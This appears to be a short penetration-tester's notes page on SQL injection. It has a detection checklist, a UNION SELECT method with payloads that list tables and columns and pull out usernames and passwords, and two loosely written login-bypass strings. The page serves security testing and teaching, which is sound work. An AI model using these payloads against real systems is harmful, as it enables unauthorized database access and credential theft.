AppSecNotes
SQL Injection
SQL injection (SQLi) is a web security vulnerability that allows an attacker to interfere with the queries that an application makes to its SQL database.
To find it:
  • Test URLs parameters, body parameters, form fields, cookies (session, fehost, TrackingIds related to analytics and any non-standard field), User-Agent and any other non-standard Header.
  • Check if it might be vulnerable manually quickly with very simple payloads.
  • Look for differences in response Content-Length and time, we might be facing Blind SQL Injection.
  • If suspecting of Blind SQL test true and false statements and check differences in the response size/time to try and extrapolate any information.
  • Try Second Order SQL Injection if an username is displayed anywhere in the page and the format of the usernames is not validated in the sign-up form.
  • Run a wordlist replacing parameter and after valid parameter.
  • Run sqlmap (with -p if the vulnerable parameter is known).
Union Select Methodology
  1. Always use comments such as #, -- or -- - at the end of the payloads (syntax depends on the database engine).
  2. Try different number of columns until results are returned: param' union select null-- -
  3. query database version: jeremy' union select null, null, version()-- -
  4. list table names (we might need to replace null with null(int) or 1 to try and match the types of the columns correctly): param' union select null, null, table_name from information_schema.tables-- -
  5. list column names: param' union select null, null, column_name from information_schema.columns-- -
  6. extract user's password: param' union select password, null, null from table_name-- -
  7. extract all users password: param' union select username, password, null from table_name-- -
Login Bypass
  • SELECT * FROM Users WHERE username: "admin" and password: "admin or 1=1"
  • SELECT * FROM Users WHERE username: "admin" and password: "admin' or 1='1"
More payloads at: PortSwigger SQL Injection Cheat Sheet.